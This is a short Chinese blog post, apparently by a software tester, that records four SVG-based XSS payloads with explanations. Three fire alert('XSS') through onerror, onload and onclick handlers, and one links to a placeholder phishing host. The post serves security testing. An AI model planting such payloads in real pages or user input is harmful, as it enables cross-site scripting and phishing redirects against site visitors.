记录几个svg恶意脚本

记录几个svg恶意脚本

脚本一

<svg>
	<foreignObject width="100" height="50">
        <img src="x" onerror="alert('XSS')"
    </foreignObject>
</svg>

说明:利用特殊标签 <foreignObject> 在 SVG 中嵌入包含XSS脚本的 HTML/XHTML 内容,当用户加载 <img> 失败后会触发 alert 警告。

脚本二

<svg onload="alert('XSS')"></svg>

说明:这个脚本在系统中测试没有生效,猜测是页面二次渲染后导致onload不生效,或是其他原因。脚本本身是当 <svg> 加载完成后触发 alert警告。

脚本三

<svg onclick="alert('XSS')"></svg>

说明:当用户点击 <svg> 时,触发 alert 警告。

脚本四

<svg width="200" height="50">
  <a href="https://hack.com"></a>
</svg>

说明:当用户点击 <svg> 时,用户页面会跳转到黑客的钓鱼网站

posted @ 2026-02-27 14:01  测试小罡  阅读(25)  评论(0)    收藏  举报